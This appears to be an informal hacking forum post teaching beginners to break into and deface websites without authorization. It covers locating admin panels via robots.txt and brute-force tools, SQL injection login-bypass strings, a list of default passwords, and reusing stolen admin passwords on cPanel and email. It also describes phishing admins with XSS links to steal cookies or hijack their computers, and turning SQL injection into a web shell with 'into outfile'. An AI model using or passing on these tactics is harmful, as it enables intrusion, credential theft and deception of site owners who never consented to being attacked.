Many of us try to hack sites every day and most of time we fail.
But there are some peoples with great talent to hack any site and we thought " GOD ... I want to be like him"
This happens to all of us ... right ?
But the thing which irritates us most is when a PRO hacker can not hack a site and same site is hacked by a new hacker who has just started learning hacking , and we thought " how the hell he did it ? "
This is my friend where you hack the PRO by being noob.
Here we will discuss a very small mistakes site admins make which leads to site deface ...
1) Many of us may familiar with SQL Injection and lot of time we inject the site and get admin pass , but we can not go further as we don't have admin panel location , here are some ways to find admin panel
a) First of all check if robots.txt file exists and if yes then see if admin link if there . If you can not find any admin related folder / file then open every file / folder admin has put to disallow . Cause there must be something in it what admin want to hide from us
b) If robots.txt method do not work then crawl the site. sometimes admin puts images or uploads in admin folder it self and from it we can get admin folder
c) In third try use some admin finder tools . Use havij or admin finder pro or something else which can brute force admin folder / file names . This not work all time but worth a shot .
d) Some times admin is really smart and he blocks every possible ways to find admin link. But still he makes mistakes. There is a golden rule in security that " NEVER SET SAME PASSWORD FOR TWO LOGINS " , but most admins ignore this. What he does that he keeps the same password in his admin panels add same password in cpanel. So check if Cpanel is there and if it's there try admin password there. Also if you find some email address from site then try that password too on his email. who know if password work and from his mails you got root passwords if site is a hosting site , it has worked for me many times.
e) If site is vulnerable to SQL injection and admin is not using standard CMS like wordpress or joomla then also try sql login bypasses like 'OR' '=' , 'OR 1=1 so on ... Also try some common passwords like admin : admin , password , 123456 , 12345678 , pass123 , password123 , root , toor , r00t , t00r , nimda (reverse of admin)
2) Many admins secures their sites for most of major attacks but forgets to patch low impact vulnerabilities .
a) Many admin do not put custom error page and keep default application error message . It is not some critical mistake but application error message can disclose if apache is there , if frontpage is there , versions etc.
b) Many admin also takes directory listing lightly. Some times it also leads to information leak. So when ever you get dir listing open then see every file in it , who know you find more then what you were searching.
c) Some small site admins do not consider XSS seriously. They underestimate power off XSS. What you do , if you find xss in his site then just create a simple mail to admin saying you have found XSS here. Admins will surly open that link directly and his cookie will be sent to you from that XSS. Also XSS is so much developed now that there are tools like Xssexploit , xsstunel from which you can hijack computers who visit exploited link. Who know if you can mail xssexploited link to admin saying you find porn on his site in this link and he will surely open that link and you get his computer ;)
d) Some misconfiguration leads to locale path disclose and admin think what a hacker can do with my local path? But my dear friend .. a hacker can do anything with any information. There is a command in SQL called into outfile from which you can directly shell the site from sql injection . here is the video explaining how
http://www.youtube.com/watch?v=9T28FC6cny8